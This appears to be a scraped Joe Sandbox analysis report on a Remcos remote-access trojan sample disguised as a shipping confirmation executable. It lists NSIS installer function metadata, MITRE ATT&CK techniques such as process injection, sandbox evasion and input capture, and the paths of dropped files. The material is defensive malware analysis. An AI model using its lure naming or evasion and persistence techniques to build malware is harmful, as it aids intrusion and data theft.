GlobalAlloc.KERNEL32(00000040,?), ref: 733B1171
GlobalAlloc.KERNEL32(00000040,?), ref: 733B11E3
GlobalFree.KERNEL32 ref: 733B124A
GlobalFree.KERNEL32(?), ref: 733B129B
GlobalFree.KERNEL32(00000000), ref: 733B12B1

Memory Dump Source

Source File: 00000000.00000002.2155284752.00000000733B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 733B0000, based on PE: true

Associated: 00000000.00000002.2155172212.00000000733B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2155846609.00000000733B4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2155909402.00000000733B6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_733b0000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 1cc626773547667d69d0166449990c3bbe9dc7509492c36139c5dbd000e6c760
Instruction ID: 44be644d3c8e797c7657e9657bf4d152c3b04a2f7bd14e70f9825993dff2b818
Opcode Fuzzy Hash: 1cc626773547667d69d0166449990c3bbe9dc7509492c36139c5dbd000e6c760
Instruction Fuzzy Hash: 42515AB6D00205DFE721EF69C884B2677BEFB48315B14412AE94ADBA50F73CAD01CB64

Function 00402643 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsx45AB.tmp\System.dll), ref: 0040269A

Strings

C:\Users\user\AppData\Local\Temp\nsx45AB.tmp, xrefs: 00402688
C:\Users\user\AppData\Local\Temp\nsx45AB.tmp\System.dll, xrefs: 0040265E, 00402683, 00402695, 004026E1

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsx45AB.tmp$C:\Users\user\AppData\Local\Temp\nsx45AB.tmp\System.dll
API String ID: 1659193697-1326484755
Opcode ID: 0bc0856152eb1df416620cc5b8216ee98a437742c409cafcdd725fde6fb42ba2
Instruction ID: 3f04c1712215209208acb7642429b7129ba4cba87377fac841ce35f74c6015ca
Opcode Fuzzy Hash: 0bc0856152eb1df416620cc5b8216ee98a437742c409cafcdd725fde6fb42ba2
Instruction Fuzzy Hash: DF110A72A40205BBCB00BBB19E4AA9F76A19F50748F21483FF502F61C1DAFD89D1665E

Function 00403C62 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(000002E4,C:\Users\user\AppData\Local\Temp\,00403B95,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403C74
CloseHandle.KERNEL32(000002F0,C:\Users\user\AppData\Local\Temp\,00403B95,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403C88

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403C67
C:\Users\user\AppData\Local\Temp\nsx45AB.tmp, xrefs: 00403C98

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsx45AB.tmp
API String ID: 2962429428-923701078
Opcode ID: aee73ed6a062803200b229e34675cefdb9ab84dda1d90898f0442dcc956d8ee4
Instruction ID: 8c071fc62b7e332c461b44292a81ac7d95f2e272703a36c0b89becc6b1ca42eb
Opcode Fuzzy Hash: aee73ed6a062803200b229e34675cefdb9ab84dda1d90898f0442dcc956d8ee4
Instruction Fuzzy Hash: C9E04F3140471896D5246F78AE4E9853A185F41335B248326F078F21F0C738995A5AA9

Function 00406059 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F

Part of subcall function 00405FFC: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,?,00406070,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"), ref: 0040600A
Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 0040600F
Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 00406027

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"), ref: 004060B2
GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0), ref: 004060C2

Strings

C:\Users\user\AppData\Local\Temp\nsx45AB.tmp, xrefs: 0040605F, 00406064, 0040606A, 004060AB, 004060B1, 004060B9, 004060C1

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsx45AB.tmp
API String ID: 3248276644-247911329
Opcode ID: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
Instruction ID: c6e62d849c1808a59ce2984a64bb42424f7e4e7bb9f9a1371c2689eace45329e
Opcode Fuzzy Hash: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
Instruction Fuzzy Hash: 17F04426144E6219D632723A0C05EAF26148F82354B57463FF853B22D1DF3C8D62C17E

Function 0040567B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004056AA
CallWindowProcW.USER32(?,?,?,?), ref: 004056FB

Part of subcall function 0040464D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040465F

Strings

, xrefs: 0040568B

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
Instruction ID: 56d6425d582badedfe6e85af8287ead15e3733fa9de593adb61ce7d3cc062d63
Opcode Fuzzy Hash: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
Instruction Fuzzy Hash: 1601B131101608ABDF205F41DE80AAF3A39EB84754F90483BF509761D0D77B8C929E6D

Function 00406550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,00000000,00000000,00421F28,?,00000800,00000000,?,00421F28,?,?,Call,?,00000000,004067C1,80000002), ref: 00406596
RegCloseKey.ADVAPI32(?), ref: 004065A1

Strings

Call, xrefs: 00406557

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 45cc12acc3a9c215c07d598151d8e3fd579320fa7e8caec45c805d12e0fab9e6
Instruction ID: 225dfe442f4fc2e839130f584d2f70a73ee2f61c7405cac2e0d59c7fe544a8ff
Opcode Fuzzy Hash: 45cc12acc3a9c215c07d598151d8e3fd579320fa7e8caec45c805d12e0fab9e6
Instruction Fuzzy Hash: 39017172510209FEDF218F55DD05EDB3BE8EB54364F014035FD1592190E738D968DBA4

Function 00405F9D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00403141,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe,C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe,80000000,00000003), ref: 00405FA3
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00403141,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe,C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe,80000000,00000003), ref: 00405FB3

Strings

C:\Users\user\Desktop, xrefs: 00405F9D

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction ID: 76a3089014cba6cdede5e63107dce03d3cc6699033e3804c636830b34c248568
Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction Fuzzy Hash: D1D05EB2401921DAE3126B04DD00D9F63ACEF12300746482AE840E7161D77C5C8186AD

Function 004060D7 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E7
lstrcmpiA.KERNEL32(00000000,00000000), ref: 004060FF
CharNextA.USER32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406110
lstrlenA.KERNEL32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406119

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
Instruction ID: 41d5ee4ea83cc4d308be6584820b02a87ee89e19241337121ce36a8d52a16fb8
Opcode Fuzzy Hash: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
Instruction Fuzzy Hash: 9DF06235504418EFC702DBA9DD00D9EBFA8EF46350B2640B9E841FB211DA74DE11AB99

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\remcos\logs.dat

C:\Users\user\AppData\Local\Temp\Feverish\Halvdelene.bat

C:\Users\user\AppData\Local\Temp\Setup.ini

C:\Users\user\AppData\Local\Temp\nsc44DF.tmp

C:\Users\user\AppData\Local\Temp\nsx45AB.tmp\System.dll

